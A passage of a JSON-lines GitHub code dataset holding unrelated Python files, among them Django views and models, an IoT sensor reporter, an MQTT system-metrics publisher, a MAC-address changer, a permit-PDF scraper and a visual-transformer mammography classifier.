rooms[r].insert(-1, c)\n\n part1(rooms, hall)\n\ndef main():\n data = parse_input()\n if '1' in sys.argv:\n part1(*data)\n if '2' in sys.argv:\n part2(*data)\n\nif __name__ == '__main__':\n main()\n","repo_name":"mattbillenstein/aoc","sub_path":"2021/23/p.py","file_name":"p.py","file_ext":"py","file_size_in_byte":7487,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"85"} +{"seq_id":"3100310602","text":"from websocket import create_connection\nimport RPi.GPIO as GPIO\nimport dht11\nfrom protocol import ProtocolGenerator\nimport time\n\nGPIO.setwarnings(False)\nGPIO.setmode(GPIO.BCM)\nGPIO.cleanup()\ninstance = dht11.DHT11(pin=14)\n\nws = create_connection(\"ws://localhost:8000\")\nwhile True:\n result = instance.read()\n\n dataTemp = ProtocolGenerator(\"/temp\", f\"{result.temperature}\")\n dataHum = ProtocolGenerator(\"/temp\", f\"{result.humidity}\")\n\n ws.send(dataTemp.create())\n ws.send(dataHum.create())\n print(\"Sent\")\n time.sleep(10)\nws.close()\n","repo_name":"Coyls/project-plant","sub_path":"temp-hum.py","file_name":"temp-hum.py","file_ext":"py","file_size_in_byte":551,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"18409068327","text":"#!/usr/bin/python\nimport os\nimport re\nimport xml.dom.minidom\n\nmap_list = []\nstring_keys = []\nstringPath = ''\nexcel_name = ''\n\ndef ParseKey(fileName):\n DOMTree = xml.dom.minidom.parse(fileName)\n collection = DOMTree.documentElement\n if collection:\n values = collection.getElementsByTagName(\"string\")\n \n keys = []\n if values:\n for value in values:\n if value.hasAttribute(\"name\"):\n map_key = value.getAttribute(\"name\")\n keys.append(map_key)\n\n return keys\n\n\ndef ParseXml(fileName):\n print(\"begin to parse %s\" % (fileName))\n DOMTree = xml.dom.minidom.parse(fileName)\n value_map = {}\n collection = DOMTree.documentElement\n\t#values = []\n if collection:\n values = collection.getElementsByTagName(\"string\")\n\n if values:\n for value in values:\n if value.hasAttribute(\"name\"):\n map_key = value.getAttribute(\"name\")\n\n \n children = value.childNodes;\n if children:\n map_value = value.childNodes[0].data\n map_value = map_value.replace('&', '&')\n else:\n map_value = \"\"\n \n value_map[map_key] = map_value \n \n \n return value_map\n\n\n\n\ndef grepStrings(projectDir):\n\tcommandProjStr = f'find {projectDir} -name \"*.java\" |xargs cat |grep -Hsn \"ToastUtils\" --binary-files=without-match > grep1.txt'\n\tprint(\"执行命令=>> \" + commandProjStr)\n\tos.system(commandProjStr)\n\n\tcommandProjStr = f'cat grep1.txt | grep \"ToastUtils.show\" > grep2.txt'\n\tprint(\"执行命令=>> \" + commandProjStr)\n\tos.system(commandProjStr)\n\n\tcommandProjStr = f'cat grep2.txt | grep -nv \"//\" > grep3.txt'\n\tprint(\"执行命令=>> \" + commandProjStr)\n\tos.system(commandProjStr)\n\n\tcommandProjStr = f'cat grep3.txt | grep \"R.string\" > result.txt'\n\tprint(\"执行命令=>> \" + commandProjStr)\n\tos.system(commandProjStr)\n\ndef matchString(resultOut):\n\twith open('result.txt', mode='r', encoding='utf-8') as f:\n\t\tfor line in f:\n\t\t\t# print(line.strip())\n\t\t\t# ret = line.find(r\"R.string.\");\n\t\t\t#\n\t\t\t# tmpStr = line[ret + 9:]\n\t\t\t# retEnd = tmpStr.find(\")\");\n\t\t\t#\n\t\t\t#\n\t\t\t# print(tmpStr)\n\t\t\t# print(ret)\n\t\t\t# print(retEnd)\n\t\t\t# print(tmpStr[0:retEnd])\n\t\t\tsplitLines = line.split(\":\")\n\n\t\t\tfor tmpLine in splitLines:\n\t\t\t\tm = re.match(r'.*R\\.string\\.(.*)\\).*', tmpLine)\n\t\t\t\tif not m:\n\t\t\t\t\tcontinue\n\n\t\t\t\ttmpResult = m.groups()[0].replace(\"))\", \"\").replace(\")\", \"\")\n\t\t\t\tresultOut.append(tmpResult)\n\t\t\t\t# print(tmpResult)\n\n\t\t\t# # print(m.groups().count())\n\t\t\t# print( m.groups().__len__())\n\t\t\t# # print(m.groups()[0])\n\nif __name__ == '__main__':\n\tprojectDir = \"/Users/lm188/AndroidStudioProjects/im_android\"\n\n\t# grepStrings(projectDir)\n\tresultOut = []\n\tmatchString(resultOut)\n\n\tstringsFielPath = \"/Users/lm188/AndroidStudioProjects/im_android/BusinessLib/src/main/res/values/strings.xml\"\n\n\n\n\tsaveList =[]\n\n\tvalue_map = ParseXml(stringsFielPath)\n\tkeys = value_map.keys();\n\t# for key, value in value_map.items():\n\t# \tif key in resultOut:\n\t# \t\tprint(keyValue[key])\n\tfor key in resultOut:\n\t\tif key in keys:\n\t\t\t# print(value_map[key])\n\n\t\t\tsaveList.append(key)\n\t\telse:\n\t\t\tpass\n\t\t\t# print(key + \"不存在\")\n\t# print(keyValue)\n\n\tsaveList =list(set(saveList))\n\tfor vaule in saveList:\n\t\tprint(vaule)\n\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"wendaoshixin/MyPythonProjs","sub_path":"fengli/ToastString/findToastStrings.py","file_name":"findToastStrings.py","file_ext":"py","file_size_in_byte":3332,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"38838851604","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n# pylint: disable=C,R\n\nfrom configparser import ConfigParser\nfrom os.path import dirname, abspath\n\nconfig = ConfigParser()\nWORKDIR = dirname( dirname( abspath( __file__ ) ) )\nconfig.read('settings.ini')\nDATABASE_URI = config.get('database', 'uri', fallback='sqlite://test.db').strip('\"')\nLOGFILE = config.get('logging', 'file', fallback='debug.log').strip('\"')\n","repo_name":"yemelgen/codecrack","sub_path":"coding_interviews/fastapi_crud/app/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":408,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"42158903569","text":"from django.db import models\nfrom apps.users.models import User\n\n# Create your models here.\nclass Setting(models.Model):\n title = models.CharField(\n max_length=255,\n verbose_name=\"Название сайта\"\n )\n description = models.TextField(\n verbose_name=\"Описание сайта\"\n )\n logo = models.ImageField(\n upload_to = \"logo/\"\n )\n phone = models.CharField(\n verbose_name=\"Телефонный номер\",\n max_length=100,\n blank = True, null = True\n )\n email = models.EmailField(\n verbose_name=\"Почта сайта\",\n blank = True, null = True\n )\n address = models.CharField(\n max_length=255,\n verbose_name=\"Адрес\",\n blank = True, null = True\n )\n facebook = models.URLField(\n verbose_name=\"Ссылка на страницу facebook\",\n blank = True, null = True\n )\n instagram = models.URLField(\n verbose_name=\"Ссылка на страницу instagram\",\n blank = True, null = True\n )\n linkedin = models.URLField(\n verbose_name=\"Ссылка на страницу linkedin\",\n blank = True, null = True\n )\n twitter = models.URLField(\n verbose_name=\"Ссылка на страницу twitter\",\n blank = True, null = True\n )\n skype = models.URLField(\n verbose_name=\"Ссылка на skype\",\n blank = True, null = True\n )\n telegram = models.URLField(\n verbose_name=\"Ссылка на telegram\",\n blank = True, null = True\n )\n whatsapp = models.URLField(\n verbose_name=\"Ссылка на whatsapp\",\n blank = True, null = True\n )\n\n def __str__(self):\n return self.title\n\n class Meta:\n verbose_name = \"Настройка\"\n verbose_name_plural = \"Настройки\"\n\nclass Contact(models.Model):\n name = models.CharField(\n max_length=100,\n verbose_name=\"Имя\")\n email = models.EmailField(\n verbose_name=\"Почта\"\n )\n title = models.CharField(\n max_length=100,\n verbose_name=\"Заголовок\"\n )\n message = models.CharField(\n max_length=255, \n verbose_name=\"Сообщение\"\n )\n status_contact = models.BooleanField(\n verbose_name=\"Статус обращения\",\n default=False\n )\n created = models.DateTimeField(\n auto_now_add=True,\n )\n\n def __str__(self):\n return f\"{self.name} {self.email}\"\n\n class Meta:\n verbose_name = \"Контакт\"\n verbose_name_plural = \"Контакты\"\n \nclass AboutUs(models.Model):\n image = models.ImageField(\n upload_to = 'about_us/',\n verbose_name=\"Фотография\"\n )\n title = models.CharField(\n max_length=255,\n verbose_name=\"Заголовок\"\n )\n description = models.CharField(\n max_length=500,\n verbose_name=\"Описание\"\n )\n\n def __str__(self):\n return self.title \n\n class Meta:\n verbose_name = \"О нас\"\n verbose_name_plural = \"О нас\"\n \nclass News(models.Model):\n user = models.ForeignKey(\n User,\n on_delete=models.DO_NOTHING,\n related_name=\"news_user\",\n verbose_name=\"Пользователь\"\n )\n title = models.CharField(\n max_length=255,\n verbose_name=\"Заговок\"\n )\n description = models.TextField(\n verbose_name=\"Описание\"\n )\n image = models.ImageField(\n upload_to = 'news_image/',\n verbose_name=\"Фотография\"\n )\n created = models.DateTimeField(\n auto_now_add=True\n )\n\n def __str__(self):\n return self.title \n\n class Meta:\n verbose_name = \"Новость\"\n verbose_name_plural = \"Новости\"","repo_name":"Toktorov/eCommerce","sub_path":"apps/settings/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":3851,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"85"} +{"seq_id":"21594746649","text":"from django.shortcuts import render , redirect\nfrom .models import DemoFormm\nfrom .forms import CreateForm\nfrom .slug import unique_slug_generator\nfrom django.core.paginator import Paginator\nfrom taggit.models import Tag\n# Create your views here.\n\n# \n\ndef create_form(request):\n\tif request.method == 'POST' :\n\t\tform = CreateForm(request.POST , request.FILES)\n\n\t\tif form.is_valid():\n\t\t\tformobj = form.save(commit=False)\n\t\t\tslug = unique_slug_generator(formobj)\n\t\t\tformobj.slug = slug\n\t\t\tformobj.save()\n\t\t\tform.save_m2m()\n\n\t\t\treturn redirect(detail_view , slug=slug)\n\t\t\t\t\n\telse:\n\t\tform = CreateForm()\n\n\tcontext = {\n\t\t'form' : form,\n\t}\n\treturn render(request, 'form1.html' , context)\n\n\ndef list_view(request):\n\tobj_list = DemoFormm.objects.all()\n\n\tpaginator = Paginator(obj_list, per_page=5)\n\tpage_number = request.GET.get('page', 1)\n\tpage_obj = paginator.get_page(page_number)\n\tcommon_tags = DemoFormm.tags.most_common()\n\n\n\tcontext = {\n\t 'page_obj': page_obj,\n\t 'paginator': paginator,\n\t 'page_number': int(page_number),\n\t 'common_tags': common_tags,\n\t \n\t }\n \n\n\treturn render(request , 'list.html' , context)\n\ndef tagged(request , slug):\n\ttag = Tag.objects.get(slug=slug)\n\tobj_list = DemoFormm.objects.filter(tags = tag)\n\tpaginator = Paginator(obj_list, per_page=5)\n\tpage_number = request.GET.get('page', 1)\n\tpage_obj = paginator.get_page(page_number)\n\tcommon_tags = DemoFormm.tags.most_common()\n\tcontext = {\n\t 'page_obj': page_obj, \n\t 'paginator': paginator,\n\t 'page_number': int(page_number),\n\t 'common_tags': common_tags, \n\t }\n \n\n\treturn render(request , 'list.html' , context)\n\ndef detail_view(request,slug):\n\tobj = DemoFormm.objects.get(slug=slug)\n\treturn render(request , 'detail.html' , {'obj':obj})\n\ndef update_view(request,slug):\n\tobj = DemoFormm.objects.get(slug=slug)\n\tif request.method == 'POST':\n\t\tform = CreateForm(request.POST,request.FILES , instance=obj)\n\t\tif form.is_valid():\n\t\t\tform.save()\n\t\t\tform.save_m2m()\n\t\t\treturn redirect(detail_view , slug=slug)\n\telse:\n\t\tform = CreateForm(instance=obj)\n\treturn render(request , 'edit.html', {'form': form})\n\n\ndef delete_view(request,slug):\n\tobj = DemoFormm.objects.get(slug=slug)\n\tif request.method == 'POST':\n\t\tobj.delete()\n\t\treturn redirect('list')\n\treturn render(request , 'delete.html' , {'obj':obj\n\t\t})\n\n","repo_name":"daxitpatel/django-taggit","sub_path":"updatenslug/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2351,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"28287205719","text":"\"\"\"Sphinx configuration.\"\"\"\nfrom datetime import datetime\n\n\nproject = \"FoGD\"\nauthor = \"Mathias Ammon\"\ncopyright = f\"{datetime.now().year}, {author}\"\nextensions = [\n \"sphinx.ext.autodoc\",\n \"sphinx.ext.napoleon\",\n \"sphinx_click\",\n]\nautodoc_typehints = \"description\"\nhtml_theme = \"furo\"\n","repo_name":"tZ3ma/fogd","sub_path":"docs/conf.py","file_name":"conf.py","file_ext":"py","file_size_in_byte":293,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"85"} +{"seq_id":"27106056211","text":"from urllib.error import URLError\nfrom urllib.request import Request\nfrom urllib.request import urlopen\nfrom urllib.request import urlretrieve\n\nimport pdfkit\nfrom bs4 import BeautifulSoup\n\nfrom 排污许可证相关.pySQLtext import get_dataid\n\n# 设置请求头,后期考虑多请求头自动切换\nheaders = {\n 'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36'\n}\nconfig = pdfkit.configuration(wkhtmltopdf=\"C:\\Program Files\\wkhtmltopdf\\\\bin\\wkhtmltopdf.exe\")\noptions = {\n # 设置PDF的质量,因为都为图片,所以其他格式不做设置\n # 参考来自https://www.jianshu.com/p/4d65857ffe5e\n #'image-quality':'40',\n 'lowquality':'',\n}\n# 如果在前一页获得了dataid,那么这一步就不需要获取链接,\n# 希望获取公司名作为验证手段和文件存储的信息,所以还是要解析详情页\n\n\ndef get_com_name(dataid,headers):\n com_url_head = 'http://permit.mep.gov.cn/permitExt/xkgkAction!xkgk.action?xkgk=getxxgkContent&dataid='\n url = com_url_head + dataid\n request = Request(url=url,headers=headers)\n try:\n html = urlopen(request)\n bs0bj = BeautifulSoup(html, 'lxml')\n com_name = bs0bj.find('p').text\n return com_name\n except URLError as e:\n print(e.reason)\n\ndef download_ben(dataid,headers,download_path):\n\n com_name = get_com_name(dataid,headers)\n # 下载许可证,指定下载位置\n fb_url_head = 'http://permit.mep.gov.cn/permitExt/syssb/wysb/hpsp/hpsp-company-sewage!showImage.action?dataid='\n zb_url_head = 'http://permit.mep.gov.cn/permitExt/upanddown.do?method=download&ewmfile=fbfile&datafileid='\n zb_url = zb_url_head + dataid\n fb_url = fb_url_head + dataid\n zb_local = download_path + com_name + '-排污许可证正本3.pdf'\n fb_local = download_path + com_name + '-排污许可证副本3.pdf'\n #fb_local = download_path + com_name + '-排污许可证副本.html'\n\n try:\n urlretrieve(zb_url, zb_local)\n # 只会下载HTML,不能下载其中的图片,所以暂时不用这个方法\n #urlretrieve(fb_url, fb_local)\n pdfkit.from_url(fb_url, fb_local, configuration=config,options=options)\n except:\n print('出错了')\n\nif __name__ == '__main__':\n download_text = 'D:\\何方辉\\排污许可\\download\\\\'\n com_url_head = 'http://permit.mep.gov.cn/permitExt/xkgkAction!xkgk.action?xkgk=getxxgkContent&dataid='\n dataid_list = get_dataid()\n for i in dataid_list:\n download_ben(i,headers,download_text)","repo_name":"c410185/-1","sub_path":"排污许可证相关/download_ben.py","file_name":"download_ben.py","file_ext":"py","file_size_in_byte":2579,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"38033955184","text":"import subprocess\nimport optparse\nimport re\n\ndef get_input():\n opt_parse = optparse.OptionParser()\n opt_parse.add_option(\"-i\",\"--interface\", dest = \"interface\", help = \"interface to change\")\n opt_parse.add_option(\"-m\", \"--mac\", dest = \"macaddress\", help = \"new mac address\")\n\n return opt_parse.parse_args()\n\ndef mac_changer(user_interface, user_mac):\n subprocess.call([\"ifconfig\", user_interface, \"down\"])\n subprocess.call([\"ifconfig\", user_interface, \"hw\", \"ether\", user_mac])\n subprocess.call([\"ifconfig\", user_interface, \"up\"])\n\ndef control_mac(user_interface):\n ifconfig = subprocess.check_output([\"ifconfig\", user_interface])\n new_mac = re.search(r\"\\w\\w:\\w\\w:\\w\\w:\\w\\w:\\w\\w:\\w\\w\", str(ifconfig))\n\n if new_mac:\n return new_mac.group(0)\n else:\n return None\n\n\n(user_input, arguments) = get_input()\nmac_changer(user_input.interface, user_input.macaddress)\nfinal = control_mac(str(user_input.interface))\nif final == user_input.macaddress:\n print(\"success\")\nelse:\n print(\"Error\")","repo_name":"begumakdeniz/macChanger","sub_path":"macChanger.py","file_name":"macChanger.py","file_ext":"py","file_size_in_byte":1031,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"15013645338","text":"#!/usr/bin/env python3\n\n# sys2mqtt version 0.3.0 (C) Fred Boniface 2020\n# Distributed under the GPLv3 License\n\n# imports\nfrom socket import gethostname # Included with python3\nfrom random import randrange # Included with python3\nimport psutil # pip3 install psutil\nimport paho.mqtt.client as mqtt # pip3 install paho-mqtt\nimport conf # Included with sys2mqtt\nfrom time import sleep # Included with python3\n\n# Get hostname\ntry:\n host = gethostname()\n print(\"Host is identified as \" + \"'\" + host + \"'\")\nexcept:\n print(\"Unable to identify host,\\nusing 'unknown'\")\n host = \"unknown\"\n\n\n# MQTT parameters\nclient_rng = randrange(0, 99999)\nclient_id = \"sys2mqtt_{}\".format(client_rng)\n# Topics\ncorestopic = \"sys2mqtt/\" + host + \"/cpu/cores\"\ncpuutiltopic = \"sys2mqtt/\" + host + \"/cpu/util\"\ntotramtopic = \"sys2mqtt/\" + host + \"/mem/ram/total\"\nramutiltopic = \"sys2mqtt/\" + host + \"/mem/ram/util\"\ntotswaptopic = \"sys2mqtt/\" + host + \"/mem/swap/total\"\nswaputiltopic = \"sys2mqtt/\" + host + \"/mem/swap/util\"\n\n# Get static metrics - CPU Cores, Total RAM, Total SWAP.\ncores = psutil.cpu_count() # Get cores\nprint(\"{} cores identified\".format(cores))\nvirtmem = psutil.virtual_memory() # Get RAM details\ntotrambyte = virtmem[0] # Get total RAM\ntotramgbyte = round(totrambyte / 1073741824, 1) # Convert to GB (1 decimal place)\nprint(\"Total RAM = {} GB\".format(totramgbyte))\nswapmem = psutil.swap_memory() # Get swap details\ntotswapbyte = swapmem[0] # Get total swap\ntotswapgbyte = round(totswapbyte / 1073741824, 1) # Convert to GB (1 decimal place)\nprint(\"Total swap = {} GB\".format(totswapgbyte))\n\n# Get CPU Cores & Utilisation\ndef getcpu():\n global procutil\n\n procutil = psutil.cpu_percent() # Get CPU usage\n print(\"CPU utilisation = {}%\".format(procutil))\n\n# Get RAM Utilisation\ndef getmem():\n global virtmem, memutil, swapmem, swaputil\n\n memutil = virtmem[2] # Get RAM util\n print(\"RAM utilisation = {}%\".format(memutil))\n swaputil = swapmem[3] # Get swap util\n print(\"Swap utilisation = {}%\".format(swaputil))\n\n\n # Initiate MQTT Connection\n\n# Gather MQTT Broker information and initiate connection\nclient = mqtt.Client()\nclient.username_pw_set(conf.username, password=conf.password)\nclient.connect(conf.broker_url, conf.broker_port)\n\n# Publish static metrics once per startup.\nclient.publish(topic=corestopic, payload=cores, qos=conf.q, retain=True)\nclient.publish(topic=totramtopic, payload=totramgbyte, qos=conf.q, retain=True)\nclient.publish(topic=totswaptopic, payload=totswapgbyte, qos=conf.q, retain=True)\n\nwhile True:\n\n getcpu()\n getmem()\n print(\"Loop Completed\")\n \n # Publish dynamic payloads\n client.publish(topic=cpuutiltopic, payload=procutil, qos=conf.q, retain=False)\n client.publish(topic=totramtopic, payload=totramgbyte, qos=conf.q, retain=True)\n client.publish(topic=ramutiltopic, payload=memutil, qos=conf.q, retain=False)\n client.publish(topic=totswaptopic, payload=totswapgbyte, qos=conf.q, retain=True)\n client.publish(topic=swaputiltopic, payload=swaputil, qos=conf.q, retain=False)\n\n sleep(10)\n","repo_name":"frdbonif/sys2mqtt","sub_path":"python/sys2mqtt.py","file_name":"sys2mqtt.py","file_ext":"py","file_size_in_byte":3129,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"4489644590","text":"# -*- coding: utf-8 -*-\n\"\"\"\nRun a pretrained ResNet-18 model in combination with visual transformer modules on CBIS-DDSM\n\nBy Thijs Werrij (thijswerrij)\nBased on code by Md Tahmid Hossain (tahmid0007)\n\"\"\"\n\nimport json\nimport time\nimport torch\nimport torchvision\nfrom torch import nn\nimport torch.nn.functional as F\nimport torch.nn.init as init\n\nimport PIL\nfrom einops import rearrange\nimport os\n\nfrom torchvision.models import resnet18\n\ndevice = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\")\n\n#%% Transformer code by Md Tahmid Hossain (tahmid0007), see repository acknowledgements\n\ndef _weights_init(m):\n classname = m.__class__.__name__\n #print(classname)\n if isinstance(m, nn.Linear) or isinstance(m, nn.Conv2d):\n init.kaiming_normal_(m.weight)\n\nclass LambdaLayer(nn.Module):\n def __init__(self, lambd):\n super(LambdaLayer, self).__init__()\n self.lambd = lambd\n\n def forward(self, x):\n return self.lambd(x)\n\n\nclass BasicBlock(nn.Module):\n expansion = 1\n\n def __init__(self, in_planes, planes, stride=1, option='A'):\n super(BasicBlock, self).__init__()\n self.conv1 = nn.Conv2d(in_planes, planes, kernel_size=3, stride=stride, padding=1, bias=False)\n self.bn1 = nn.BatchNorm2d(planes)\n self.conv2 = nn.Conv2d(planes, planes, kernel_size=3, stride=1, padding=1, bias=False)\n self.bn2 = nn.BatchNorm2d(planes)\n\n self.shortcut = nn.Sequential()\n if stride != 1 or in_planes != planes:\n if option == 'A':\n \"\"\"\n For CIFAR10 ResNet paper uses option A.\n \"\"\"\n self.shortcut = LambdaLayer(lambda x:\n F.pad(x[:, :, ::2, ::2], (0, 0, 0, 0, planes//4, planes//4), \"constant\", 0))\n elif option == 'B':\n self.shortcut = nn.Sequential(\n nn.Conv2d(in_planes, self.expansion * planes, kernel_size=1, stride=stride, bias=False),\n nn.BatchNorm2d(self.expansion * planes)\n )\n\n def forward(self, x):\n out = F.relu(self.bn1(self.conv1(x)))\n out = self.bn2(self.conv2(out))\n out += self.shortcut(x)\n out = F.relu(out)\n #print(out.size())\n return out\n\n\n\nclass Residual(nn.Module):\n def __init__(self, fn):\n super().__init__()\n self.fn = fn\n def forward(self, x, **kwargs):\n return self.fn(x, **kwargs) + x\n\nclass LayerNormalize(nn.Module):\n def __init__(self, dim, fn):\n super().__init__()\n self.norm = nn.LayerNorm(dim)\n self.fn = fn\n def forward(self, x, **kwargs):\n return self.fn(self.norm(x), **kwargs)\n\nclass MLP_Block(nn.Module):\n def __init__(self, dim, hidden_dim, dropout = 0.1):\n super().__init__()\n self.nn1 = nn.Linear(dim, hidden_dim)\n torch.nn.init.xavier_uniform_(self.nn1.weight)\n torch.nn.init.normal_(self.nn1.bias, std = 1e-6)\n self.af1 = nn.GELU()\n self.do1 = nn.Dropout(dropout)\n self.nn2 = nn.Linear(hidden_dim, dim)\n torch.nn.init.xavier_uniform_(self.nn2.weight)\n torch.nn.init.normal_(self.nn2.bias, std = 1e-6)\n self.do2 = nn.Dropout(dropout)\n \n def forward(self, x):\n x = self.nn1(x)\n x = self.af1(x)\n x = self.do1(x)\n x = self.nn2(x)\n x = self.do2(x)\n \n return x\n\nclass Attention(nn.Module):\n def __init__(self, dim, heads = 8, dropout = 0.1):\n super().__init__()\n self.heads = heads\n self.scale = dim ** -0.5 # 1/sqrt(dim)\n\n self.to_qkv = nn.Linear(dim, dim * 3, bias = True) # Wq,Wk,Wv for each vector, thats why *3\n torch.nn.init.xavier_uniform_(self.to_qkv.weight)\n torch.nn.init.zeros_(self.to_qkv.bias)\n \n self.nn1 = nn.Linear(dim, dim)\n torch.nn.init.xavier_uniform_(self.nn1.weight)\n torch.nn.init.zeros_(self.nn1.bias) \n self.do1 = nn.Dropout(dropout)\n \n\n def forward(self, x, mask = None):\n b, n, _, h = *x.shape, self.heads\n qkv = self.to_qkv(x) #gets q = Q = Wq matmul x1, k = Wk mm x2, v = Wv mm x3\n q, k, v = rearrange(qkv, 'b n (qkv h d) -> qkv b h n d', qkv = 3, h = h) # split into multi head attentions\n\n dots = torch.einsum('bhid,bhjd->bhij', q, k) * self.scale\n\n if mask is not None:\n mask = F.pad(mask.flatten(1), (1, 0), value = True)\n assert mask.shape[-1] == dots.shape[-1], 'mask has incorrect dimensions'\n mask = mask[:, None, :] * mask[:, :, None]\n dots.masked_fill_(~mask, float('-inf'))\n del mask\n\n attn = dots.softmax(dim=-1) #follow the softmax,q,d,v equation in the paper\n\n out = torch.einsum('bhij,bhjd->bhid', attn, v) #product of v times whatever inside softmax\n out = rearrange(out, 'b h n d -> b n (h d)') #concat heads into one matrix, ready for next encoder block\n out = self.nn1(out)\n out = self.do1(out)\n return out\n\nclass Transformer(nn.Module):\n def __init__(self, dim, depth, heads, mlp_dim, dropout):\n super().__init__()\n self.layers = nn.ModuleList([])\n for _ in range(depth):\n self.layers.append(nn.ModuleList([\n Residual(LayerNormalize(dim, Attention(dim, heads = heads, dropout = dropout))),\n Residual(LayerNormalize(dim, MLP_Block(dim, mlp_dim, dropout = dropout)))\n ]))\n def forward(self, x, mask = None):\n for attention, mlp in self.layers:\n x = attention(x, mask = mask) # go to attention\n x = mlp(x) #go to MLP_Block\n return x\n \n#%%\n\nclass PretrainedViTResNet(nn.Module):\n def __init__(self, in_channels=3, num_classes=3, dim = 128, num_tokens = 8, mlp_dim = 256, heads = 8, depth = 6, emb_dropout = 0.1, dropout= 0.1, batch_size=(100,100), pretrained=True, remove_last_block=False):\n #super().__init__(BasicBlock, [3, 3, 3], *args, **kwargs)\n super(PretrainedViTResNet, self).__init__()\n \n self.in_planes = 16\n self.L = num_tokens\n self.cT = dim\n \n resnet = resnet18(pretrained=pretrained, progress=False).to(device)\n modules = list(resnet.children())\n if remove_last_block: # original paper replaces last BasicBlock with VT modules; if remove_last_block = True, last BB is removed\n self.resnet = nn.Sequential(*modules[:-3])\n outsize = 256\n else:\n self.resnet = nn.Sequential(*modules[:-2])\n outsize = 512\n #self.final = modules[-2:]\n #self.apply(_weights_init)\n \n # Tokenization\n self.token_wA = nn.Parameter(torch.empty(batch_size[0],self.L, outsize),requires_grad = True) #Tokenization parameters\n torch.nn.init.xavier_uniform_(self.token_wA)\n self.token_wV = nn.Parameter(torch.empty(batch_size[1],outsize,self.cT),requires_grad = True) #Tokenization parameters\n torch.nn.init.xavier_uniform_(self.token_wV) \n \n \n self.pos_embedding = nn.Parameter(torch.empty(1, (num_tokens + 1), dim))\n torch.nn.init.normal_(self.pos_embedding, std = .02) # initialized based on the paper\n\n #self.patch_conv= nn.Conv2d(64,dim, self.patch_size, stride = self.patch_size) \n\n self.cls_token = nn.Parameter(torch.zeros(1, 1, dim)) #initialized based on the paper\n self.dropout = nn.Dropout(emb_dropout)\n\n self.transformer = Transformer(dim, depth, heads, mlp_dim, dropout)\n\n self.to_cls_token = nn.Identity()\n\n self.nn1 = nn.Linear(dim, num_classes) # if finetuning, just use a linear layer without further hidden layers (paper)\n torch.nn.init.xavier_uniform_(self.nn1.weight)\n torch.nn.init.normal_(self.nn1.bias, std = 1e-6)\n \n def forward(self, img, mask = None):\n \n x = self.resnet(img)\n \n x = rearrange(x, 'b c h w -> b (h w) c') # 64 vectors each with 64 points. These are the sequences or word vecotrs like in NLP\n\n #Tokenization \n wa = rearrange(self.token_wA, 'b h w -> b w h') #Transpose\n A= torch.einsum('bij,bjk->bik', x, wa) \n A = rearrange(A, 'b h w -> b w h') #Transpose\n A = A.softmax(dim=-1)\n\n VV= torch.einsum('bij,bjk->bik', x, self.token_wV) \n T = torch.einsum('bij,bjk->bik', A, VV) \n #print(T.size())\n\n cls_tokens = self.cls_token.expand(img.shape[0], -1, -1)\n x = torch.cat((cls_tokens, T), dim=1)\n x += self.pos_embedding\n x = self.dropout(x)\n x = self.transformer(x, mask) #main game\n x = self.to_cls_token(x[:, 0]) \n x = self.nn1(x)\n \n return x\n\n#%% Custom dataset (CBIS-DDSM)\n\nfrom torch.utils.data import DataLoader\nfrom cbis_ddsm_train import CBISDataset\n\n#%% Transform\n\ntransform = {\n 'train': torchvision.transforms.Compose([\n torchvision.transforms.ToPILImage(),\n torchvision.transforms.RandomHorizontalFlip(),\n torchvision.transforms.RandomRotation(10, resample=PIL.Image.BILINEAR),\n #torchvision.transforms.RandomAffine(8, translate=(.15,.15)),\n torchvision.transforms.ToTensor(),\n #torchvision.transforms.Normalize((12513.3505859375), (16529.138671875)), # not necessary with pre-normalized dataset\n torchvision.transforms.Lambda(lambda x: x.expand(3, -1, -1)), # go from BW images to color images\n ]),\n 'val': torchvision.transforms.Compose([\n torchvision.transforms.ToTensor(),\n #torchvision.transforms.Normalize((12513.3505859375), (16529.138671875)),\n torchvision.transforms.Lambda(lambda x: x.expand(3, -1, -1)),\n ])\n}\n\n#%% Training and evaluation\n\nfrom args import parser\nfrom cbis_ddsm_train import run, cross_validate, plot\n\nif __name__ == \"__main__\":\n\n parser.add_argument('--no-pretrain', action='store_true',\n help='do not use pretraining (pretrained ResNet is used by default)')\n parser.add_argument('--remove-last-block', action='store_true',\n help='If set to true, the two Basic Blocks of ResNet-18 are removed')\n \n args = parser.parse_args()\n vargs = vars(args)\n print(vargs)\n print()\n\n train_dataset = CBISDataset(args.train_data, args.batch_size_train, transform['train'], binary=args.binary_classification, oversample=args.oversample, bp_filter=args.filter)\n test_dataset = CBISDataset(args.val_data, args.batch_size_val, transform['val'], binary=args.binary_classification, oversample=False, bp_filter=args.filter)\n \n train_loader = DataLoader(train_dataset, batch_size=args.batch_size_train, shuffle=True, num_workers=args.num_workers)\n test_loader = DataLoader(test_dataset, batch_size=args.batch_size_val, shuffle=False)\n \n #%%\n \n categories = 2 if args.binary_classification else 3\n pretrained = not args.no_pretrain\n batch_size = (args.batch_size_train, args.batch_size_val)\n \n # List of arguments\n num_tokens = args.num_tokens # number of visual tokens\n depth = args.transform_depth # number of transformer modules\n \n model = PretrainedViTResNet(pretrained=pretrained, num_classes=categories, dim=args.dim, mlp_dim=args.mlp_dim, 